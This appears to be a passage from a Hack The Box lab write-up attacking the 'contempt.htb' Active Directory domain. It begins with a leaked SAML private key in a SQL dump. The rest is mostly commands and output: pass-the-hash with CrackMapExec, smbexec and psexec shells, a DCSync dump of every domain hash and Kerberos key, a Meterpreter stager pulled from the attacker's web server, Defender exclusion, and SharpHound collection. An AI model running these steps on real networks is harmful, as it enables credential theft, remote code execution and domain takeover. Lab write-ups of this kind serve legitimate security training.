INSERT INTO `oc_user_saml_configurations` VALUES (1,'SSO for Operators','{\"general-uid_mapping\":\"userPrincipalName\",\"general-idp0_display_name\":\"SSO for Operators\",\"sp-x509cert\":\"-----BEGIN CERTIFICATE-----\\nMIIFQTCCBCmgAwIBAgITWwAAAANjH\\/PPeIdqSwAAAAAAAzANBgkqhkiG9w0BAQsF\\nADBKMRMwEQYKCZImiZPyLGQBGRYDaHRiMRgwFgYKCZImiZPyLGQBGRYIY29udGVt\\ncHQxGTAXBgNVBAMTEGNvbnRlbXB0LURDMDEtQ0EwIBcNMjMwNTE4MTc0MzQxWhgP\\nMjA3MzA1MTgxNzUzNDFaMCoxETAPBgNVBAoTCENvbnRlbXB0MRUwEwYDVQQDEwxj\\nb250ZW1wdC5odGIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDKmCJ+\\ngPK7stMMOQfrXWJNBDR48v4CvR2aSVIyTVXhcJ8RAg8UveBVkUnZjAC3fx++2pLH\\nA4f90uq81DK9wbqfzA9IU+i9hp53kD8f7uG+c80pIrBkHK8fQI93TVjbiFcHCDN4\\nD1ZlBamL1lWxDq5UVdzZ3g1GX07p9UlVSdI4q1lhjaNiqJGXRsMjTUJVytQPp3Fv\\n0zne5C9XC18leyWJyprxFkjsgpYm9HJXbQHbeXFl5nChvvOKecrMjDzVJTMwtD5+\\nCrzi3hKzX7ZtO+n4wEn3b5a\\/nppDN9fhqRo3JA8E5r6EkUzvGor1ryVK+bKquYsN\\nBQUnLIip3EzkcBE5AgMBAAGjggI8MIICODAOBgNVHQ8BAf8EBAMCBaAwIAYDVR0l\\nAQH\\/BBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMCEGA1UdEQQaMBiCFm5leHRjbG91\\nZC5jb250ZW1wdC5odGIwHQYDVR0OBBYEFIDWV9mGQ\\/b1i10f3iSL2NC1VbQ+MB8G\\nA1UdIwQYMBaAFF\\/f71P\\/gxVPvlhmfBS0D5M5OeLxMIHMBgNVHR8EgcQwgcEwgb6g\\ngbuggbiGgbVsZGFwOi8vL0NOPWNvbnRlbXB0LURDMDEtQ0EsQ049ZGMwMSxDTj1D\\nRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29u\\nZmlndXJhdGlvbixEQz1jb250ZW1wdCxEQz1odGI\\/Y2VydGlmaWNhdGVSZXZvY2F0\\naW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHD\\nBggrBgEFBQcBAQSBtjCBszCBsAYIKwYBBQUHMAKGgaNsZGFwOi8vL0NOPWNvbnRl\\nbXB0LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENO\\nPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y29udGVtcHQsREM9aHRiP2NB\\nQ2VydGlmaWNhdGU\\/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9y\\naXR5MAwGA1UdEwEB\\/wQCMAAwDQYJKoZIhvcNAQELBQADggEBAAvXR+7PdS3wc\\/K3\\n+ZspqDsl+tHRzxVuTZA\\/dq1F\\/CdnRYa3hckFkDsK41i\\/AB6LeIfrFPrmvydGwbQE\\n8sk5qXo5\\/whrLPtxNhU3KzG24S0qVtXZSLnuLY\\/26RDe9SdukpjGg2ku08EaYcHC\\nQiHsCEOAzsdKcANgLv2UMHMS23q\\/7ewg1ASe80MV3jq2aDONG+tI08DXkTaJ\\/6DH\\nv9Q\\/Rd9ojv6qAkG6G55zhVutobKn4Bpp37fJqwvmHeHvPh845vAwBG6zZm3ErD9O\\nooVkvlpFuk6MzjXhClyjJQ\\/pf3okPwaCoYORYA\\/+1mm8EZWl+4zfaPQK28\\/cvQ49\\nSZvh1t0=\\n-----END CERTIFICATE-----\",\"sp-privateKey\":\"-----BEGIN PRIVATE KEY-----\\nMIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQDKmCJ+gPK7stMM\\nOQfrXWJNBDR48v4CvR2aSVIyTVXhcJ8RAg8UveBVkUnZjAC3fx++2pLHA4f90uq8\\n1DK9wbqfzA9IU+i9hp53kD8f7uG+c80pIrBkHK8fQI93TVjbiFcHCDN4D1ZlBamL\\n1lWxDq5UVdzZ3g1GX07p9UlVSdI4q1lhjaNiqJGXRsMjTUJVytQPp3Fv0zne5C9X\\nC18leyWJyprxFkjsgpYm9HJXbQHbeXFl5nChvvOKecrMjDzVJTMwtD5+Crzi3hKz\\nX7ZtO+n4wEn3b5a\\/nppDN9fhqRo3JA8E5r6EkUzvGor1ryVK+bKquYsNBQUnLIip\\n3EzkcBE5AgMBAAECggEBAL0+Myp8BUFzn1TRiSZASuyqOuGoCcJBKX\\/PcapvNwOp\\nEczvYWr8mqsTViqSbrD5XIwI3AZus\\/9Tn9XXWbaLWmqeUMA9MTCoqSoCYhTQLaqb\\nvU7pil9Zs\\/O7eMf2RkR7LN\\/ytzE1Eny3N1LaWZ1Um19H\\/U697ySHLs24RFIY7Pfk\\n218FbMt4QxIm19OL66iuN1DhhuG4t6pXKAuNXmHDeiY1cEIkJ4lmytw7PXeDA+8F\\nqvFdLgkDvNXa61nfF9Q\\/Baa7khkcLL8U8nMd8Oas6ghNZ66RoR98Huh4VrJsqBv2\\naCwa82O7mR\\/0vthABHgJiILIEdAhqGrT4HWhiG3AwSECgYEA\\/ae9uGhN68+17sf\\/\\neNrNEZ4tFVTCpSQ2toLfka4HrzXWF2Gz537DK2aR\\/A8L2ZJtDdvnI8Ne25IA8pe8\\nQBDu38q6az2J1HUDnDYsGwqidNdIJnQqkFPeeGlwGwhsC++OtDc9L1vLv0G+hUvQ\\nIoF\\/X31xyfJCwhVjfyndMIzMUtUCgYEAzHePpzIrA88rJ2WRJoF3FM2OolAB+xP0\\ngqlPcsae+mgQFiqkwU1N2wcl8dN0fOQRinm2gaRRCBCX87GpZjEaJBp9XRsGe5sN\\nIZcipUbTKcDY9rFONaUthp7lRdtskR\\/0ag5szNRJjULIgsLsu4M5VnqqczsLW24z\\niqTHiwMJjtUCgYEAyeZrn83+P\\/XsJW0yDztxwVU7I2B9Mj+aATo4xFdWrILYr3HI\\nZjpDFVemWZCMaRkhDsf7uj63UWRstqxKXmBcEuvl6JhqDh85yWxhPQEBAKmfN2R9\\nwLXRPd0HK61Pe0yqNQ5G+FxD2C93e9g1ilGzVgmeuhTISH4H3V8wPYXE2SUCgYAL\\n2Wnz0I55nAnuMI6m4p3aEMeRVH2o5VEoOVOnXSddb6ZvAm2l3isC5HkoeI6ppjX2\\nBnOzM6iWhQ+pScR9bZ8MNJTLToOjqiqqpa2WUnJuWwS31zKnHTl0McUrtTmnd2ic\\ntNVNUYgprZMdMNqzSzmJb3ZtUyCnXc2S3VXLEpP9OQKBgQDpaCRjNxDpsXwKWS\\/6\\nYwG2p+qOqBisatcCOWAcoO9qtHFcRwqh1w5YQJmeIhz0WJoAE5SVnYu8nSbJTMMO\\naKo2Eqd0dG3yszNbHPgvXwBBIfT1i9y+PWa\\/gzf3CDzaoOe8PYz7EBh1LtYYQes2\\nCfqlrBB+vgR2z6ggJAUn0XC9Hw==\\n-----END PRIVATE KEY-----\",\"idp-entityId\":\"http:\\/\\/adfs.contempt.htb\\/adfs\\/services\\/trust\",\"idp-singleSignOnService.url\":\"https:\\/\\/adfs.contempt.htb\\/adfs\\/ls\\/idpinitiatedsignon.aspx\",\"idp-singleLogoutService.url\":\"https:\\/\\/adfs.contempt.htb\\/adfs\\/ls\\/\",\"idp-singleLogoutService.responseUrl\":\"https:\\/\\/adfs.contempt.htb\\/adfs\\/ls\\/?wa=wsignout1.0\",\"idp-x509cert\":\"-----BEGIN CERTIFICATE-----\\nMIIC4DCCAcigAwIBAgIQMaYk2bvg2LRNKzTmQakRYDANBgkqhkiG9w0BAQsFADAr\\nMSkwJwYDVQQDEyBBREZTIFNpZ25pbmcgLSBhZGZzLmNvbnRlbXB0Lmh0YjAgFw0y\\nMzA1MTgxNzU5MjFaGA8yMDczMDUwNTE3NTkyMVowKzEpMCcGA1UEAxMgQURGUyBT\\naWduaW5nIC0gYWRmcy5jb250ZW1wdC5odGIwggEiMA0GCSqGSIb3DQEBAQUAA4IB\\nDwAwggEKAoIBAQCTPjHPaXxBjr\\/V0BXBUZustn5Rsi3aGTPGCT0BxTAu7+EQNsS+\\nNxHTwBOE8+B+t8tQoCFK1LJEbSh\\/AUrpDD44Gxyta20ukYGekZbfEYNnnyZH7mNG\\n4JVOoc9w\\/GPZU6hSV9d+E\\/FOvuc53jhCAOMr9D+P\\/FdKSZvnF3NQm5y5WofURdAl\\n2rPp3E4w\\/YPMz2WALdpaBcinotqZmxWNozBSHdBgnkIyJQR+lzKnVpYrfPxNzo24\\nemd4uRP6b\\/+snar+NEVXNtQyzxEPXPAZvkW+CzNOdIyjYejpENEyCcJkSkSMude\\/\\n6aZbWrUagy+9CaKaGpv768Y6CShQ\\/gBsPDRRAgMBAAEwDQYJKoZIhvcNAQELBQAD\\nggEBAGmio73NSXGlI7FOpa\\/WthW+L78bx3a1rB0xpjCt2Cn54My+JLGuGTKBlZgA\\nNXEw0ARZZAvow7y52M2nOwJOXpHRHlPEf8Y5Udx5Iy9Ov34\\/kUwi2cvlpIXd6hDb\\nWYkrqrsNCub\\/9jEaMPS4H43i\\/fLBrEN8R7lsfQh1jLqAdyulrZLFIZbbXiGPvfua\\noIvcObVlO4i+pVTuSkONzzaru6uppZWQLywL1U\\/VwDUd\\/WCVte7Ow3J5Hz4yl4fc\\n6u6fhBE+xdSZ\\/MslhPRNofbyb9d+wzGDynTec24mjGwMj61h\\/QXrnlhxe2+0rKzb\\n3KdHXRcfm5rMP4MZnwr6g+DPHV4=\\n-----END CERTIFICATE-----\",\"security-logoutRequestSigned\":\"1\",\"security-logoutResponseSigned\":\"1\"}');
/*!40000 ALTER TABLE `oc_user_saml_configurations` ENABLE KEYS */;
UNLOCK TABLES;

Appendix: DC01 Active Directory Enumeration

CrackMapExec as echo.rivers

Confirming the echo.rivers hash works against DC01 and enumerating shares. Only NETLOGON is READ,WRITE, which is the share we abuse for execution.

cme smb contempt.htb -u echo.rivers -H a7be11b5be8bb84196edbd0e8c0bc9ea --shares
SMB         contempt.htb    445    DC01             [*] Windows Server 2016 Standard 14393 x64 (name:DC01) (domain:contempt.htb) (signing:True) (SMBv1:True)
SMB         contempt.htb    445    DC01             [+] contempt.htb\echo.rivers:a7be11b5be8bb84196edbd0e8c0bc9ea (Pwn3d!)
SMB         contempt.htb    445    DC01             [*] Enumerated shares
SMB         contempt.htb    445    DC01             Share           Permissions     Remark
SMB         contempt.htb    445    DC01             -----           -----------     ------
SMB         contempt.htb    445    DC01             IPC$                            Remote IPC
SMB         contempt.htb    445    DC01             NETLOGON        READ,WRITE      Logon server share
SMB         contempt.htb    445    DC01             SYSVOL          READ            Logon server share

impacket-smbexec contemp.htb/[email protected] -hashes :a7be11b5be8bb84196edbd0e8c0bc9ea -share NETLOGON
Impacket v0.10.1.dev1+20230524.180921.8b3f9eff - Copyright 2022 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>

C:\Windows\system32>type \users\administrator\desktop\root.txt
HTB{HeY_iv3_g0n3_phIsHINg_leav3_4_meSs4g3}

C:\Windows\system32>dir \users\
 Volume in drive C has no label.
 Volume Serial Number is BA89-5628

 Directory of C:\users

05/23/2023  10:35 AM    <DIR>          .
05/23/2023  10:35 AM    <DIR>          ..
05/19/2023  01:42 PM    <DIR>          Administrator
07/15/2023  09:25 AM    <DIR>          aria.frost
05/18/2023  10:58 AM    <DIR>          MSSQL$MICROSOFT##WID
05/18/2023  06:23 AM    <DIR>          Public
05/18/2023  10:58 AM    <DIR>          svc-adfs$
               0 File(s)              0 bytes
               7 Dir(s)   5,955,788,800 bytes free

Secretsdump as echo.rivers

A DCSync over the echo.rivers Domain Admin hash dumps all NTDS secrets and Kerberos keys (note these hashes differ from the original box — the domain was reset in the Revenge version).

impacket-secretsdump contemp.htb/[email protected] -hashes :a7be11b5be8bb84196edbd0e8c0bc9ea
Impacket v0.10.1.dev1+20230524.180921.8b3f9eff - Copyright 2022 Fortra

[*] Target system bootKey: 0x967989d3074f229978b8148f7d8f0199
[-] SAM hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
[-] LSA hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8845ad387f66869ab9768c8a7b08b36f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d8d6f9644b7ef09c5c9d12d01a18bc7a:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
contempt.htb\svc-ldap:1104:aad3b435b51404eeaad3b435b51404ee:b6fa6cd30819a545a7f12a76b54b6e84:::
contempt.htb\seraphina.blake:1601:aad3b435b51404eeaad3b435b51404ee:2f320b121f6ae368a35ba9819e0d2516:::
contempt.htb\phoenix.reed:1602:aad3b435b51404eeaad3b435b51404ee:8213160e905b6817df4ee0c2c8b48e12:::
contempt.htb\cipher.stone:1603:aad3b435b51404eeaad3b435b51404ee:a5e12330358741a01370caf5dc316f86:::
contempt.htb\zero.summers:1604:aad3b435b51404eeaad3b435b51404ee:b8e7d7f4e6361c680c24f0a7bdd6e92a:::
contempt.htb\viper.hollow:1605:aad3b435b51404eeaad3b435b51404ee:744574681328753ff5c843b8d3c100a2:::
contempt.htb\matrix.cross:1606:aad3b435b51404eeaad3b435b51404ee:2c03a59578699559cc2940d712fd964d:::
contempt.htb\orion.swift:1607:aad3b435b51404eeaad3b435b51404ee:928e41a48e0597ec9747c7b6b9fd86db:::
contempt.htb\aria.frost:1608:aad3b435b51404eeaad3b435b51404ee:61ce0f295d185e5226c0bd2d15200588:::
contempt.htb\echo.rivers:1609:aad3b435b51404eeaad3b435b51404ee:a7be11b5be8bb84196edbd0e8c0bc9ea:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:eaac724a88e63f2cdbd7d93766324889:::
svc-adfs$:1103:aad3b435b51404eeaad3b435b51404ee:cef7c3f6a499d80785287d7a634e65f2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:4ca1297ea05d179a81e486dc716f5a5ccce17c6b3167de9250ac4fc6c595f497
Administrator:aes128-cts-hmac-sha1-96:883c5b4c63729772c932580348b2d79d
Administrator:des-cbc-md5:5762026e0b8a676b
krbtgt:aes256-cts-hmac-sha1-96:af5fab8ee8043ec508ba825261880218cb8c0081a7ff377a24cf407bbe0c479b
krbtgt:aes128-cts-hmac-sha1-96:6692498b5a907f81739233f5fed1222b
krbtgt:des-cbc-md5:3e57ba9852d9f1f7
contempt.htb\svc-ldap:aes256-cts-hmac-sha1-96:b642e2cecf4ad987863e4c6ef796362b068effe5490f78d9d795ebcea9fb048f
contempt.htb\svc-ldap:aes128-cts-hmac-sha1-96:f45ebc5ba876670f82a40d05031e650b
contempt.htb\svc-ldap:des-cbc-md5:8379d00457f215df
contempt.htb\seraphina.blake:aes256-cts-hmac-sha1-96:9fffdf9b5c98bff130ae181633bf6ec9afa7a74d4a8340919a5476ac17386b4b
contempt.htb\seraphina.blake:aes128-cts-hmac-sha1-96:a9c1d1e6fb284f67b569970630e24094
contempt.htb\seraphina.blake:des-cbc-md5:20fd0e9ba489b670
contempt.htb\phoenix.reed:aes256-cts-hmac-sha1-96:a669c953c85d2b654aaec12044d3cf1894d4763f4dc70d38b0395d5aed8423f5
contempt.htb\phoenix.reed:aes128-cts-hmac-sha1-96:9fd781bd3781c3afffe244baefd05b86
contempt.htb\phoenix.reed:des-cbc-md5:407f9715e9cb01d6
contempt.htb\cipher.stone:aes256-cts-hmac-sha1-96:d24879ed4a66c1d3e9893696067bbdf1e7066c76b722139f3234a3ddc966eb65
contempt.htb\cipher.stone:aes128-cts-hmac-sha1-96:1ccd97851637e02a76ee6f5f4349a12e
contempt.htb\cipher.stone:des-cbc-md5:cbd5766edcbc493e
contempt.htb\zero.summers:aes256-cts-hmac-sha1-96:9c83efb0d58f9bed269d3ce56f929ac374ba8db1e92bd61c43052e93cb66361f
contempt.htb\zero.summers:aes128-cts-hmac-sha1-96:4499a978a221a8e1c7814d3cbf2638e5
contempt.htb\zero.summers:des-cbc-md5:a20791d075610dba
contempt.htb\viper.hollow:aes256-cts-hmac-sha1-96:d4a27343c74afdff7585309c8465a6e0c98128c2dbb72e3582e5bb475cf53342
contempt.htb\viper.hollow:aes128-cts-hmac-sha1-96:c9c0412b232f4bb8b8be87441559b9da
contempt.htb\viper.hollow:des-cbc-md5:f857a48f3b0432f8
contempt.htb\matrix.cross:aes256-cts-hmac-sha1-96:ef5dad34552541d7d6e04c85ce90f29558cf4006d764fe55a17b90945132c0bf
contempt.htb\matrix.cross:aes128-cts-hmac-sha1-96:19252f32a179d6355d4b283fca549176
contempt.htb\matrix.cross:des-cbc-md5:13f86162438f5e51
contempt.htb\orion.swift:aes256-cts-hmac-sha1-96:8adde5e58b8afa5f6ad4f6bdb81dd07f076abdfc0f98d97e7112191fe7a75f20
contempt.htb\orion.swift:aes128-cts-hmac-sha1-96:353168e5c46c54cdb908d5c36eb3b8bf
contempt.htb\orion.swift:des-cbc-md5:d91a015edad557e3
contempt.htb\aria.frost:aes256-cts-hmac-sha1-96:7344a815fcaa1164a70b1b4f242400a21024527601eec4cfd1d592c4da13727e
contempt.htb\aria.frost:aes128-cts-hmac-sha1-96:381078897d68c179fd7a383be8392acb
contempt.htb\aria.frost:des-cbc-md5:1c4ac72a8ae5a49b
contempt.htb\echo.rivers:aes256-cts-hmac-sha1-96:f8008d68ae5b8b491aa53e46bad5d01ae2d381172070c8081a4229b7418164f2
contempt.htb\echo.rivers:aes128-cts-hmac-sha1-96:6513c0343a7083b4a862a2f3a85f7730
contempt.htb\echo.rivers:des-cbc-md5:9bef64c745a73ddf
DC01$:aes256-cts-hmac-sha1-96:f071d627624a2b90e9c29cc95a645cff635ccbf21d594f0419d0ba0976073d48
DC01$:aes128-cts-hmac-sha1-96:0e1f35c5d6bd812d5202d77774f51401
DC01$:des-cbc-md5:cd9e234c43ab98c2
svc-adfs$:aes256-cts-hmac-sha1-96:778da8e3fd51ec0ad7a55b685f39cc424219421facb9e1cef77158366521b49e
svc-adfs$:aes128-cts-hmac-sha1-96:b37dd6fe46baf60cde747e84f3314e91
svc-adfs$:des-cbc-md5:f4c2d31c8f79f1fe
[*] Cleaning up...

Psexec and C2 Staging

With the Administrator hash, psexec.py stages a shellcode runner from the writable NETLOGON share, then a Metasploit handler catches a Meterpreter session. We migrate into winlogon.exe, disable Defender on a working directory, and upload SharpHound for AD collection.

impacket-psexec contemp.htb/[email protected] -hashes :8845ad387f66869ab9768c8a7b08b36f -file /var/www/html/shellcode_runner_stager.exe
Impacket v0.10.1.dev1+20230524.180921.8b3f9eff - Copyright 2022 Fortra

[*] Requesting shares on contempt.htb.....
[*] Found writable share NETLOGON
[*] Uploading file dyoosGbD.exe
[*] Opening SVCManager on contempt.htb.....
[*] Creating service oRVi on contempt.htb.....
[*] Starting service oRVi.....

HOST80 -d /var/www/html -i shell.sh
Directory: /var/www/html
URL: http://10.10.14.79/
URL: http://168431183/
Serving HTTP on 0.0.0.0 port 80 ...
10.129.251.205 - - [18/Jul/2023 12:43:32] "GET /met.bin HTTP/1.1" 200 -
Host: 10.10.14.79
Connection: Keep-Alive

msf6 exploit(multi/handler) >
[*] Encoded stage with x64/xor
[*] Sending encoded stage (200815 bytes) to 10.129.251.205
[*] Meterpreter session 2 opened (10.10.14.79:443 -> 10.129.251.205:49720) at 2023-07-18 12:44:11 -0400

meterpreter > migrate -N winlogon.exe
[*] Migrating from 6552 to 624...
[*] Migration completed successfully.

powershell Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
meterpreter > upload /var/www/html/SharpHound.exe
[*] Uploading  : /var/www/html/SharpHound.exe -> SharpHound.exe
[*] Uploaded 1.00 MiB of 1.00 MiB (100.0%): /var/www/html/SharpHound.exe -> SharpHound.exe
[*] Completed  : /var/www/html/SharpHound.exe -> SharpHound.exe
meterpreter > execute -i -f SharpHound.exe -a "-c all --zipfilename BloodHound.zip"
Process 3504 created.
Channel 6 created.
2023-07-18T09:45:46.2107964-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-07-18T09:45:46.3358003-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-07-18T09:45:46.3514203-07:00|INFORMATION|Initializing SharpHound at 9:45 AM on 7/18/2023
2023-07-18T09:45:46.6482950-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-07-18T09:45:47.1795446-07:00|INFORMATION|Beginning LDAP search for contempt.htb
2023-07-18T09:45:47.2732986-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-07-18T09:45:47.2732986-07:00|INFORMATION|LDAP channel closed, waiting for consumers

meterpreter > execute -i -f SharpHound.exe -a "-c all --zipfilename BloodHound.zip"
Process 3504 created.
Channel 6 created.
2023-07-18T09:45:46.2107964-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-07-18T09:45:46.3358003-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-07-18T09:45:46.3514203-07:00|INFORMATION|Initializing SharpHound at 9:45 AM on 7/18/2023
2023-07-18T09:45:46.6482950-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-07-18T09:45:47.1795446-07:00|INFORMATION|Beginning LDAP search for contempt.htb
2023-07-18T09:45:47.2732986-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-07-18T09:45:47.2732986-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-07-18T09:46:17.9764499-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2023-07-18T09:46:29.9764231-07:00|INFORMATION|Consumers finished, closing output channel
2023-07-18T09:46:29.9920535-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2023-07-18T09:46:30.0701720-07:00|INFORMATION|Status: 120 objects finished (+120 2.857143)/s -- Using 43 MB RAM
2023-07-18T09:46:30.0701720-07:00|INFORMATION|Enumeration finished in 00:00:42.8909426
2023-07-18T09:46:30.1326746-07:00|INFORMATION|Saving cache with stats: 77 ID to type mappings.
 78 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-07-18T09:46:30.1482988-07:00|INFORMATION|SharpHound Enumeration Completed at 9:46 AM on 7/18/2023! Happy Graphing!

BloodHound Parse

Parsing the SharpHound collection summarizes the domain. Highlights: DC01$ has unconstrained delegation; the Domain Admins are echo.rivers, aria.frost, and Administrator; the custom NEXTCLOUD group holds matrix.cross, viper.hollow, zero.summers, and cipher.stone; orion.swift is AS-REP roastable; and svc-adfs$ is Kerberoastable.

bloodhoundparse.py 20230718094629_BloodHound.zip
Parsing 20230718094629_BloodHound.zip ...
[*] Computer data found in zip file
[*] User data found in zip file
[*] Group data found in zip file
[*] Domain data found in zip file

===================================================
=================== DOMAIN DATA ===================
===================================================
[*] Domains:
CONTEMPT.HTB S-1-5-21-3087775142-3775047424-3590407223
[*] High Value Domains:
CONTEMPT.HTB,S-1-5-21-3087775142-3775047424-3590407223
[*] Domain Creation Times:
CONTEMPT.HTB,S-1-5-21-3087775142-3775047424-3590407223,Thu 18 May 2023 05:29:01 EST
[*] Domain Versions:
CONTEMPT.HTB,S-1-5-21-3087775142-3775047424-3590407223,2016

===================================================
================== COMPUTER DATA ==================
===================================================
[*] Domains:
CONTEMPT.HTB S-1-5-21-3087775142-3775047424-3590407223
[*] Enabled Computers:
dc01$,DC01.CONTEMPT.HTB,S-1-5-21-3087775142-3775047424-3590407223-1000
[*] Computers without Laps:
dc01$,DC01.CONTEMPT.HTB,S-1-5-21-3087775142-3775047424-3590407223-1000
[*] Computers with Service Principal Names:
dc01$,DC01.CONTEMPT.HTB,S-1-5-21-3087775142-3775047424-3590407223-1000
    => dfsr-12f9a27c-bf97-4787-9364-d31b6c55eb04/dc01.contempt.htb
    => ldap/dc01.contempt.htb/forestdnszones.contempt.htb
    => ldap/dc01.contempt.htb/domaindnszones.contempt.htb
    => hyper-v replica service/dc01
    => hyper-v replica service/dc01.contempt.htb
    => microsoft virtual system migration service/dc01
    => microsoft virtual system migration service/dc01.contempt.htb
    => microsoft virtual console service/dc01
    => microsoft virtual console service/dc01.contempt.htb
    => dns/dc01.contempt.htb
    => gc/dc01.contempt.htb/contempt.htb
    => restrictedkrbhost/dc01.contempt.htb
    => restrictedkrbhost/dc01
    => rpc/617bbe12-930d-4556-b752-36a14e8b99fb._msdcs.contempt.htb
    => host/dc01/contempt
    => host/dc01.contempt.htb/contempt
    => host/dc01
    => host/dc01.contempt.htb
    => host/dc01.contempt.htb/contempt.htb
    => e3514235-4b06-11d1-ab04-00c04fc2dcd2/617bbe12-930d-4556-b752-36a14e8b99fb/contempt.htb
    => ldap/dc01/contempt
    => ldap/617bbe12-930d-4556-b752-36a14e8b99fb._msdcs.contempt.htb
    => ldap/dc01.contempt.htb/contempt
    => ldap/dc01
    => ldap/dc01.contempt.htb
    => ldap/dc01.contempt.htb/contempt.htb
[*] Computers Logged in:
dc01$,DC01.CONTEMPT.HTB,S-1-5-21-3087775142-3775047424-3590407223-1000 ==> Sat 15 Jul 2023 08:53:59 EST
[*] Computer Creation Times:
dc01$,DC01.CONTEMPT.HTB,S-1-5-21-3087775142-3775047424-3590407223-1000 ==> Thu 18 May 2023 05:29:43 EST
[*] Computers with Operating System:
dc01$,DC01.CONTEMPT.HTB,S-1-5-21-3087775142-3775047424-3590407223-1000 ==> windows server 2016 standard
[*] Unconstrained Delegation Systems:
dc01$,DC01.CONTEMPT.HTB,S-1-5-21-3087775142-3775047424-3590407223-1000

===================================================
=================== GROUP DATA ====================
===================================================
[*] Domains:
CONTEMPT.HTB S-1-5-21-3087775142-3775047424-3590407223
[*] High Value Groups:
[email protected],CONTEMPT.HTB-S-1-5-32-544
DOMAIN [email protected],S-1-5-21-3087775142-3775047424-3590407223-512
ENTERPRISE [email protected],S-1-5-21-3087775142-3775047424-3590407223-519
[*] Admin Contained Groups:
[email protected],CONTEMPT.HTB-S-1-5-32-544
SCHEMA [email protected],S-1-5-21-3087775142-3775047424-3590407223-518
DOMAIN [email protected],S-1-5-21-3087775142-3775047424-3590407223-512
ENTERPRISE [email protected],S-1-5-21-3087775142-3775047424-3590407223-519
[*] Group Creation Times:
[email protected],CONTEMPT.HTB-S-1-5-32-544 ==> Thu 18 May 2023 05:29:06 EST
SYSTEM MANAGED ACCOUNTS [email protected],CONTEMPT.HTB-S-1-5-32-581 ==> Thu 18 May 2023 05:29:06 EST
CERTIFICATE SERVICE DCOM [email protected],CONTEMPT.HTB-S-1-5-32-574 ==> Thu 18 May 2023 05:29:06 EST
[email protected],CONTEMPT.HTB-S-1-5-32-568 ==> Thu 18 May 2023 05:29:06 EST
[email protected],CONTEMPT.HTB-S-1-5-32-546 ==> Thu 18 May 2023 05:29:06 EST
[email protected],CONTEMPT.HTB-S-1-5-32-545 ==> Thu 18 May 2023 05:29:06 EST
SCHEMA [email protected],S-1-5-21-3087775142-3775047424-3590407223-518 ==> Thu 18 May 2023 05:29:43 EST
DOMAIN [email protected],S-1-5-21-3087775142-3775047424-3590407223-512 ==> Thu 18 May 2023 05:29:43 EST
ENTERPRISE [email protected],S-1-5-21-3087775142-3775047424-3590407223-519 ==> Thu 18 May 2023 05:29:43 EST
CERT [email protected],S-1-5-21-3087775142-3775047424-3590407223-517 ==> Thu 18 May 2023 05:29:43 EST
GROUP POLICY CREATOR [email protected],S-1-5-21-3087775142-3775047424-3590407223-520 ==> Thu 18 May 2023 05:29:43 EST
DENIED RODC PASSWORD REPLICATION [email protected],S-1-5-21-3087775142-3775047424-3590407223-572 ==> Thu 18 May 2023 05:29:43 EST
WINDOWS AUTHORIZATION ACCESS [email protected],CONTEMPT.HTB-S-1-5-32-560 ==> Thu 18 May 2023 05:29:43 EST
PRE-WINDOWS 2000 COMPATIBLE [email protected],CONTEMPT.HTB-S-1-5-32-554 ==> Thu 18 May 2023 05:29:43 EST
[email protected],S-1-5-21-3087775142-3775047424-3590407223-1114 ==> Thu 18 May 2023 06:49:13 EST
[*] Groups with Descriptions:
[email protected],CONTEMPT.HTB-S-1-5-32-544 ==> Administrators have complete and unrestricted access to the computer/domain
SCHEMA [email protected],S-1-5-21-3087775142-3775047424-3590407223-518 ==> Designated administrators of the schema
DOMAIN [email protected],S-1-5-21-3087775142-3775047424-3590407223-512 ==> Designated administrators of the domain
ENTERPRISE [email protected],S-1-5-21-3087775142-3775047424-3590407223-519 ==> Designated administrators of the enterprise
